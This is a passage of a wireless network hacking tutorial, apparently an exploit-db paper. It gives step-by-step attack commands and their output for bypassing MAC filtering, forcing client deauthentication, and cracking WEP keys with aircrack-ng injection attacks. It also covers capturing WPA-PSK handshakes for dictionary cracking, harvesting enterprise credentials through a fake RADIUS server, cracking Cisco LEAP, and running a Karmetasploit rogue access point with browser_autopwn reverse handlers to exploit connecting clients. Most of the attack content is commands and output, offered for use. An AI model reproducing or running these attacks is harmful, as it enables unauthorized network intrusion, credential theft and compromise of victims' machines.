talk about hacking these security standards and mechanisms in this tutorial and also provide other attacking methods which hacker
wireless network.
#######################################
[0x02] - Breaking the Simple Defenses
#######################################
++++++++++++++++++++++++++++++++
[0x02a] - Bypass Mac Filtering
++++++++++++++++++++++++++++++++
This is a basic security method by storing legitimate client MAC address in the access point. When there is authen
to access point, the access point compares the requesting MAC address with MAC address stored in its memory. If the result
the authentication is success otherwise it is failed. However, this method is easy to bypass, the attacker is only change
We have a case study of bypassing MAC filtering attack. One day, we have a change to do the wireless penetration t
First, we use kismet to discover the access points around the company. This make us know the exact location of each access
by fixing channel for capturing packets. Fixing the target channel can improve efficiency of airodump-ng. We know from air
the access point use open authentication and it does not use any encryption. So, we try to connect to the access point but
our authentication request. We conclude that this network use MAC filtering. From airodump-ng, we see that there are clien
We immediately change our MAC address to be like the associated client and try to connect again. In this time, everything
Moreover, we are able to access internal network of this company and run any tools, such as nmap, nessus, exploit, against
++++++++++++++++++++++++++++++++
[0x02b] - Discover Hidden SSID
++++++++++++++++++++++++++++++++
Some environment, wireless administrator config to hidden ssid. So, the attacker cannot know the ssid of network
and also cannot connect to that network. In airodump, it shows <lenght ?> where ? is the number of ssid lenght.
The only way to know the ssid name is from association request. This packet occurs when there is a legitimate client conne
We are able to force a legitimate client to re-connect to access point by sending de-authentication packet to the client b
The command for doing that is like this:
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
After sending du-authentication packet to the client, the client will do re-authentication and re-association.
Airodump-ng can detect this process and know SSID of this network.
++++++++++++++++++++++++++++++++++++++++++++
[0x02c] - Sniffing informations on the Air
++++++++++++++++++++++++++++++++++++++++++++
This topic does not use any advance technique or deep knowledge. Many wireless networks use open authentication wi
encryption mechanism. The attacker needs only sniffing packets from the air and find the credential information of protoco
telnet, ftp etc. These protocol does not have any encryption. So, we can find username and password by only looking the ca
We are able to sniff others data by using airodump-ng.
###########################################
[0x03] - Get closer with cracking tool
###########################################
We Recommend to use Aircrack-NG, Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once
have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new
thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wirel
+++++++++++++++++++++++++++++
[0x03a] - Aircrack-ng suite
+++++++++++++++++++++++++++++
There are four tools in aircrack-ng suite which play an important role in this tutorial.
- airodump-ng: used for capturing packets
Use airodump-ng first every time in order to open monitor mode, which also enable injection capability of our card
- aireplay-ng: used for injection
o de-authentication: used to send deauthentication packet to associated client
o fake authentication: used to perform fake authentication process
o interactive packet replay: used to choose the preferred packet to perform replay attack
o arp replay: used to perform arp replay attack automatically
2 of 12 12/24/10 5:48 PM
3. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
o Korek chopchop: used to generate key stream by using chopchop technique
o fragment: used to generate key stream by using fragment technique
- packetforge-ng: used for create packet
- aircrack-ng: used for recovering key
More detail: http://aircrack-ng.org/doku.php#aircrack-ng_suite1
+++++++++++++++++++++++++++++++++++++++++++
[0x03b] - Decrypt packet with airdecap-ng
+++++++++++++++++++++++++++++++++++++++++++
After we got WEP or WPA key, sometime we want to decrypt captured packet. Aircrack team has already
provide us the tool for doing that. It is called "airdecap-ng". Examples of using airdecap is something like:
#airdecap-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap
or
#airdecap-ng -e Workshop workshop-02.cap
The output from these commands is file ending with "-dec.cap".
PS. for WPA, airdecap-ng will return successful result for only file which contains four ways handshake.
+++++++++++++++++++++++++++++++++++++++++++++
[0x03c] - Decloak packet with airdecloak-ng
+++++++++++++++++++++++++++++++++++++++++++++
Cloaking is a technique to disturb cracking WEP key process. This technique is done by injecting packets which are
to the network, these packets are called "chaff". If the attacker capture these packet and do the cracking, The result wil
returned. However, aircrack team developped the tool to deal with this technique, it is called "airdecloak-ng".
#airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap
This command return two files:
- workshop-01-filtered.cap: contain the filtered packets from specific bssid
- workshop-01-cloaked.cap: contain the cloaked packets from specific bssid
++++++++++++++++++++++++++++
[0x03d] - AirCracking 101
++++++++++++++++++++++++++++
PTW Attack (-z)
(aircrack-ng -z capture.cap), Only work for WEP 64/128 bits, Require ARP request/replay packet that you mu
Dictionary Attack (WPA/WPA2 passphrases)
(aircrack-ng -w pass.lst *.cap)
Fudge Attack (-f)
Once hit 2 millions IVs, Try fudge factor to "-f 4". Retry, increasing the fudge factor by adding 4 to it
** All the while, keep collecting data. Remember the golden rule, "The More IVs the Better"
#################################################################
[0x04] - Owned the WEP Key with Simple Technique (No Injection)
#################################################################
WEP is just like a dead method to protect network from unauthorized access. There are several means to crack WEP k
The first of all, we should prepare the device which supports monitor mode and can inject packet to the network.
After that we prepare tools for cracking, I choose to use aircrack-ng in BT3 final on vmware.
Ok, let clear about concept of cracking WEP.
The main idea is to collect the encrypted packets as much and fast as we can and then use these packets to crack for the W
So, there are two situations from the above idea.
1. The network is high traffic.
2. The network is low traffic.
What's different between them?
Of course, the first case, we use only airodump to collect packet and crack the key but the second case,
we have to inject packets to capture more packets. We introduce you, first, the capturing and cracking method.
Then we talk about injecting method which is used only with low traffic network.
++++++++++++++++++++++++++++
[0x04a] - Capturing method
++++++++++++++++++++++++++++
First, introduce you the way to collect packets. For 64-bits WEP key, we use about 50,000 IV packets and
about 150,000 IV packets for 128-bits WEP key.
The command for collecting packets is
#airodump-ng –w workshop rausb0
3 of 12 12/24/10 5:48 PM
4. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
------------------------------------------------------------------------------------------
[ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
xx:xx:xx:xx:xx:xx 77 94 10905 11054 0 11 54. WEP WEP OPN Workshop
BSSID STATION PWR Rate Lost Packets Probes
xx:xx:xx:xx:xx:xx yy:yy:yy:yy:yy:yy 85 54-54 0 7747
------------------------------------------------------------------------------------------
We will get file “workshop-01.cap†used for cracking the key later.
We can determine the number of packet by the data field, around 90% of packets showing in data field are our required IV p
+++++++++++++++++++++++++++
[0x04b] - Cracking method
+++++++++++++++++++++++++++
After we collected enough encrypted packets (IV packets), we use aircrack-ng for recovering the key.
#aircrack-ng –b xx:xx:xx:xx:xx:xx workshop-01.cap
-b xx:xx:xx:xx:xx:xx is the MAC address of target access point
The successful cracking result is following:
---------------------------------------------------------------
Opening workshop-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
#########################################################################
[0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)
#########################################################################
This method is not necessary in high traffic network but it is very important in low traffic network. The idea behind this
we have to inject a packet to force access point to generate new packet back to client. The new packet contains new IV.
If we carefully think about above idea, the source MAC address must be associated, the packet must send from client to acc
and the packet must cause the access point to produce the response or another packet; normally we should the packet which has broa
We can conclude about the requirements of chosen packet for injection as following.
- The MAC address is associated to access point. (we can do this by fake authentication)
- Send from client to access point. (the “To DS†flag is set to 1)
- The destination MAC address is broadcast. (FF:FF:FF:FF:FF:FF)
The well-known packet which covers all requirements is arp request broadcast. In the aircrack-ng suite, there is aireplay-
- The network has ARP request.
- The network has no ARP request.
No matter which case we are faced with, the important we have to realize is that we have to perform injection with associa
Now, we have two choices. First is to change our MAC address to be the associated MAC address or the second is to do fake authenti
++++++++++++++++++++++++
[0x05a] - Monitor Mode
++++++++++++++++++++++++
Using airmon-ng for setting your wifi card to Monitor Mode and prepare for Injection packet.
#airmon-ng start wlan0 11
Setting wlan0 to Monitor mode on channel 11, We must specify the same channel as the target AP channel.
+++++++++++++++++++++++++++++++
[0x05b] - Fake Authentication
+++++++++++++++++++++++++++++++
We can do fake authentication by following command.
#aireplay-ng -1 0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
–a xx:xx:xx:xx:xx:xx is MAC address of access point
–h yy:yy:yy:yy:yy:yy is MAC address of our wireless card
If we get successful result, our MAC address will associate with particular access point.
The successful result look like:
------------------------------------------
00:00:00 Sending Authentication Request
00:00:00 Authentication successful
00:00:00 Sending Association Request
00:00:00 Association successful :-)
------------------------------------------
After succeeding in fake authentication, we have to determine what type of network we are faced with and pick the appropri
4 of 12 12/24/10 5:48 PM
5. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
+++++++++++++++++++++++++++++
[0x05c] - Arp Replay Attack
+++++++++++++++++++++++++++++
We can use arp replay attack by following command.
#aireplay-ng -3 -b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
–b xx:xx:xx:xx:xx:xx is MAC address of access point
–h yy:yy:yy:yy:yy:yy is MAC address of our wireless card
Aireplay-ng will detect arp request and use it to perform replay attack automatically.
The response will look like following when it find out arp request.
------------------------------------------------------------------------------------
21:06:20 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
Saving ARP requests in replay_arp-0223-210620.cap
You should also start airodump-ng to capture replies.
Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps)
------------------------------------------------------------------------------------
** In some cases, there is no arp request broadcasted from access point. So, we cannot use normal arp replay attac
We have to generate key stream from captured packet and use the key stream to forge arp request packet and then replay to
in order to generate new IV packet. There are two ways for generate key stream called “chopchop attack†and “fragme
Both methods can perform by aireplay-ng.
++++++++++++++++++++++++++++++++
[0x05d] - Fragmentation Attack
++++++++++++++++++++++++++++++++
Fragment attack is used to generate key stream in a size of 1500 bytes. So, we can use this key stream to create a
which has size up to 1500 bytes. The command for fragment attack is
#aireplay-ng -5 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
The system responds with this:
-------------------------------------------------------------------------------
21:21:07 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
21:21:07 Waiting for a data packet...
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 20df 0000 b168 ff00 2872 ../=.. ....h..(r
0x0020: 7547 d03f 70d7 2d29 1397 7d3d ac16 382a uG.?p.-)..}=..8*
0x0030: f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263 ..w..c.....(...c
0x0040: 5315 a328 87cb 0d4a b36a e5be 93c7 307a S..(...J.j....0z
0x0050: 7bc2 18d7 2df5 94f2 5aed {...-...Z.
Use this packet ?
-------------------------------------------------------------------------------
We have to answer "y"
-----------------------
Use this packet ? y
-----------------------
And the successful process looks like this:
----------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-212107.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0223-212107.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
----------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++
[0x05e] - Korek ChopChop Attack
+++++++++++++++++++++++++++++++++
There is a guy called KoreK who develop the tricky attacking method called chopchop. It requires only one encrypte
to get key stream and then use the key stream to generate arp request packet and finally perform arp replay attack.
We are able to use chopchop attack with this command.
5 of 12 12/24/10 5:48 PM
6. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
#aireplay-ng -4 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
Aireplay-ng will pick a packet for decrypting. we can should any packet which has BSSID like our target.
The response from the command looks like this:
--------------------------------------------------------------------------------------
21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N
0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'..
0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K....
0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC.
0x0050: b09b f0f1 8b04 fc1c 0b72 .........r
Use this packet ?
----------------------------------------------------------------------------------------
And we will answer by typing "y" like this
---------------------
Use this packet ? y
---------------------
And then the system do the decrypting
---------------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-211242.cap
Offset 87 ( 3% done) | xor = 4E | pt = 3C | 64 frames written in 1097ms
Offset 86 ( 5% done) | xor = 16 | pt = 1D | 119 frames written in 2029ms
Offset 85 ( 7% done) | xor = 63 | pt = 7F | 146 frames written in 2476ms
Offset 84 ( 8% done) | xor = 97 | pt = 6B | 239 frames written in 4068ms
Offset 83 (10% done) | xor = 0E | pt = 0A | 228 frames written in 3865ms
Offset 82 (12% done) | xor = 86 | pt = 0D | 273 frames written in 4646ms
Offset 81 (14% done) | xor = C9 | pt = 38 | 2 frames written in 35ms
Offset 80 (16% done) | xor = C4 | pt = 34 | 185 frames written in 3145ms
Offset 79 (17% done) | xor = BB | pt = 20 | 250 frames written in 4253ms
Offset 78 (19% done) | xor = F7 | pt = 47 | 97 frames written in 1649ms
Offset 77 (21% done) | xor = E9 | pt = 4E | 247 frames written in 4196ms
Offset 76 (23% done) | xor = 12 | pt = 51 | 237 frames written in 4029ms
Offset 75 (25% done) | xor = 56 | pt = 00 | 52 frames written in 884ms
Offset 74 (26% done) | xor = 2A | pt = 00 | 431 frames written in 7326ms
Offset 73 (28% done) | xor = 7E | pt = 71 | 232 frames written in 3946ms
Offset 72 (30% done) | xor = 1C | pt = EB | 123 frames written in 2093ms
Offset 71 (32% done) | xor = B6 | pt = CB | 9 frames written in 141ms
Offset 70 (33% done) | xor = BC | pt = FA | 256 frames written in 4365ms
Offset 69 (35% done) | xor = 1A | pt = 18 | 179 frames written in 3041ms
Offset 68 (37% done) | xor = 94 | pt = 50 | 118 frames written in 2002ms
Offset 67 (39% done) | xor = 50 | pt = 71 | 65 frames written in 1109ms
Offset 66 (41% done) | xor = 9D | pt = 55 | 172 frames written in 2921ms
Offset 65 (42% done) | xor = 3C | pt = 48 | 196 frames written in 3338ms
Offset 64 (44% done) | xor = BE | pt = F6 | 281 frames written in 4763ms
Offset 63 (46% done) | xor = 81 | pt = BE | 61 frames written in 1051ms
Offset 62 (48% done) | xor = AC | pt = 17 | 456 frames written in 7748ms
Offset 61 (50% done) | xor = D2 | pt = 72 | 73 frames written in 1231ms
Offset 60 (51% done) | xor = 9C | pt = 34 | 428 frames written in 7288ms
Offset 59 (53% done) | xor = 64 | pt = B7 | 120 frames written in 2036ms
Offset 58 (55% done) | xor = 87 | pt = 55 | 188 frames written in 3200ms
Offset 57 (57% done) | xor = 0C | pt = 47 | 119 frames written in 2024ms
Offset 56 (58% done) | xor = 8C | pt = 07 | 124 frames written in 2095ms
Offset 55 (60% done) | xor = 2C | pt = 02 | 364 frames written in 6197ms
Offset 54 (62% done) | xor = 25 | pt = 00 | 136 frames written in 2315ms
Offset 53 (64% done) | xor = 44 | pt = A8 | 142 frames written in 2410ms
Offset 52 (66% done) | xor = A2 | pt = C0 | 102 frames written in 1733ms
Offset 51 (67% done) | xor = C9 | pt = 14 | 19 frames written in 329ms
Offset 50 (69% done) | xor = D5 | pt = 6B | 183 frames written in 3110ms
Offset 49 (71% done) | xor = 0B | pt = 2E | 62 frames written in 1048ms
Offset 48 (73% done) | xor = E8 | pt = CF | 18 frames written in 306ms
Offset 47 (75% done) | xor = FB | pt = 86 | 29 frames written in 496ms
Offset 46 (76% done) | xor = 4B | pt = 3D | 100 frames written in 1702ms
Offset 45 (78% done) | xor = D6 | pt = 06 | 77 frames written in 1312ms
Offset 44 (80% done) | xor = FD | pt = 6D | 226 frames written in 3828ms
Offset 43 (82% done) | xor = 27 | pt = 00 | 117 frames written in 2001ms
Offset 42 (83% done) | xor = 4F | pt = 40 | 38 frames written in 641ms
Offset 41 (85% done) | xor = 1C | pt = 54 | 354 frames written in 6020ms
Offset 40 (87% done) | xor = 20 | pt = D5 | 277 frames written in 4714ms
Offset 39 (89% done) | xor = C4 | pt = 30 | 113 frames written in 1918ms
Offset 38 (91% done) | xor = 2C | pt = 00 | 485 frames written in 8244ms
Offset 37 (92% done) | xor = 8A | pt = 00 | 231 frames written in 3933ms
The AP appears to drop packets shorter than 37 bytes.
6 of 12 12/24/10 5:48 PM
7. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
Enabling standard workaround: IP header re-creation.
This doesn't look like an IP packet, try another one.
Warning: ICV checksum verification FAILED! Trying workaround.
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: IP header re-creation.
Saving plaintext in replay_dec-0223-211410.cap
Saving keystream in replay_dec-0223-211410.xor
Completed in 21s (2.48 bytes/s)
---------------------------------------------------------------------------------------
The result from this process is xor file and cap file. xor file contains key stream and cap file contains decrypted packet
+++++++++++++++++++++++
[0x05f] - Packetforge
+++++++++++++++++++++++
Creat encrypted packet form PRGA (XOR) that obtained from chopchop or fragment.
#Packetforge-ng -0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy –k 255.255.255.255 –l 255.255.255.255 –y re
The result is:
----------------------
Wrote packet to: arp
----------------------
From this command, we get arp request packet in file named “arp†.
++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x05g] - ARP Request Replay with Interactive Attack
++++++++++++++++++++++++++++++++++++++++++++++++++++++
We use aireplay to inject arp request packet to access point by following command.
#aireplay-ng -2 –r arp rausb0
The response will look like:
-----------------------------------------------------------------------------------
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:27:C0:07:71
0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q
0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334 ........U....N.4
0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l;
0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~
0x0040: 66bf 700e f.p.
Use this packet ?
-----------------------------------------------------------------------------------
We have to answer "y"
---------------------
Use this packet ? y
---------------------
aireplay-ng starts injecting the packet.
-------------------------------------------------------
Saving chosen packet in replay_src-0223-211755.cap
You should also start airodump-ng to capture replies.
Sent 1200 packets...(499 pps)
-------------------------------------------------------
++++++++++++++++++++++++++++
[0x05h] - Cracking WEP Key
++++++++++++++++++++++++++++
After we collected enough encrypted packets (IV packets), we use aircrack-ng for recovering the key.
#aircrack-ng –z capture1.cap (PTW Attack)
The successful cracking result is following:
---------------------------------------------------------------
Opening capture1.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
7 of 12 12/24/10 5:48 PM
8. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
##############################################
[0x06] - Conclusion Scripts for Cracking WEP
##############################################
Note: $AP is Access Point MAC Address
$WIFI is WIFI Card MAC Address
- airmon-ng start wlan0 11 (Must specific channel of Monitor Mode)
- airodump-ng -c 11 -w capture1.cap wlan0
- aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0
- aireplay-ng -4 -b $AP -h $WIFI wlan0
If Not Work!! Try #aireplay-ng -5 -b $AP -h $WIFI wlan0
- packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay_dec-03.xor -w arp-request
- aireplay-ng -2 -r arp-request wlan0
- aircrack-ng -z capture1.cap
** These Method can use for Crack WEP with Clientless
#########################################
[0x07] - Owned the WPA-PSK/WPA2-PSK Key
#########################################
PSK stands for Pre-Shared Key. These are mechanism improved to solve WEP vulnerabilities.
So, it is able to crack the key by using the same ways as cracking WEP. The only way to recover WPA-PSK or WPA2-PSK is to capture
four ways handshake and crack by using dictionary attack.
The idea for cracking Pre-shared key is to gather four ways handshake packet. We are able to do this by de-authenticate as
This way will force the client to perform re-authentication and we can get four ways handshake from this process. The command for
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
We assume that we capture this process in workshop.cap file. So, we perform cracking by using aircrack.
#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap
The successful result is following.
--------------------------------------------------------------------------------
Opening test-02.cap
Read 252 packets.
# BSSID ESSID Encryption
1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake)
Choosing first network as target.
Opening workshop-02.cap
Reading packets, please wait...
Aircrack-ng 1.0 rc1 r1085
[00:00:00] 0 keys tested (0.00 k/s)
KEY FOUND! [ TheFuckinWPAKey ]
Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4
E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63
Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6
61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2
9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86
2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1
EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
--------------------------------------------------------------------------------
From this result, it means WPA-PSK/WPA2-PSK key is "TheFuckinWPAKey".
#############################################################
[0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
#############################################################
Most companies turned to use public key encryption with wireless network and they think that
it is perfectly safe. But the tricky hacker still attacks this system by spoofing certificate.
This attacking method takes an advantage of client incaution. Many clients accept certification
without considering whether it is genuine certificate or not. This make attacker impersonate himself
to be radius server and loggin credential information from victims.
We can use freeradius as fake radius server combining with wpe patch to enable loggin credential
information on freeradius server
8 of 12 12/24/10 5:48 PM
9. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
additional information: http://www.willhackforsushi.com/FreeRADIUS_WPE.html
################################
[0x09] - Exploiting CISCO LEAP
################################
Cisco proprietary Lightweight Extensible Authentication Protocol (LEAP) wireless authentication process helps eliminate se
by supporting centralized, user-based authentication and the ability to generate dynamic WEP keys. Cisco LEAP is one of the extens
types specified by 802.1X.
LEAP is easy to implement and contains compelling features such as:
- Mutual Authentication
- User-Based Authentication
- Dynamic WEP Keys
We found username that send to Radius is plaintext that captured from wireshark but password was encrypted, So It's also V
asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords
- Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture
- Deauthentication of clients on a leap WLAN (speeding up leap password recovery) AIRJACK DRIVER REQUIRED
Download Here: http://asleap.sourceforge.net/
First step, Use asleap to produce the necessary database (.dat) and index files (.idx)
#./genkeys -r dict -f dict.dat -n dict.idx
dict = Our wordlist/dictionary file, with one word per line
dict.dat = Our new output pass+hash file (generated as a result of running this command)
dict.idx = Our new output index filename (generated as a result of running this command)
#./genkeys -r dictionary -f dict.dat -n dict.idx
-----------------------------------------------------------------------
genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com>
Generating hashes for passwords (this may take some time) ...Done.
3 hashes written in 0.2 seconds: 122.67 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 0 compares.
Creating index file (almost finished) ...Done.
-----------------------------------------------------------------------
The final step in recovering our weak LEAP password is to run the asleap command with our newly created .dat and .idx file
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) c
dict.dat = Our output pass+hash file (generated with genkeys, see above)
dict.idx = Our new output index filename (generated with genkeys, see above)
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
-----------------------------------------------------------------------
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Captured LEAP exchange information:
username: qa_leap
challenge: 0786aea0215bc30a
response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
hash bytes: 4a39
NT hash: a1fc198bdbf5833a56fb40cdd1a64a39
password: qaleap
Closing pcap ...
-----------------------------------------------------------------------
Notice: The successful rate is up to dictionary size
Now ASLEAP 2.2, which includes the “-C†and “-R†options to specify the hex-delimited bytes for the challenge an
##########################################
[0x10] - Mass Exploit with Karmetasploit
##########################################
HD Moore released some documentation (http://trac.metasploit.com/wiki/Karmetasploit) to get karmetasploit working with the
Karmetasploit can launch fake AP and exploit the client who connects to the fake AP. Hacker can log cookie, ftp, http, cre
of the client and still also exploit the browser vulnerabilities on client machine.
This Method was test in Backtrack3 (Final)
1. Update Aircrack-NG
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ make
# make install
9 of 12 12/24/10 5:48 PM
10. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
2. Let's do our aireplay-ng test to see if things are working (Your WIFI card must support for Injection packet)
bt# aireplay-ng -9 wlan0
15:10:21 Trying broadcast probe requests...
15:10:21 Injection is working!
15:10:25 Found 5 APs
15:10:25 Trying directed probe requests...
15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC'
15:10:35 0/30: 0%
15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP'
15:10:42 0/30: 0%
15:10:42 00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM'
15:10:48 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27
15:10:48 5/30: 60%
15:10:48 Injection is working!
15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi'
15:56:53 0/30: 0%
Now It's work for Injection !!
3. Update Metasploit
$ svn co http://metasploit.com/svn/framework3/trunk msf3
4. Download Bash script from http://www.darkoperator.com/kmsapng.tgz
The script will do the following:
- Change the MAC address of the interface
- Set the Interface in Monitor Mode
- Start the Karma AP with Airbase-ng
- Change the MTU Size for the interface
- Set the IP
- Start the DHCPD server
- Set in iptables a redirect of all traffic to it self so as to bypass cached DNS entries
- Start Metasploit.
6. After that we run our kmsapng.sh like this:
#./kmsapng.sh -i wlan0 -m km -s linksys
Changing MAC Address
Current MAC: 00:0f:c1:08:12:91 (Wave Corporation)
Faked MAC: 00:40:1b:5b:b0:0b (Printer Systems Corp.)
starting fake ap
This will take 15 seconds ..............
DHCPD started successfully
Starting Packet capture to /root/kms.cap
Starting Metasploit
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / _|/ _|/ / _| |
| | |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/
/|
|
=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
10 of 12 12/24/10 5:48 PM
11. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
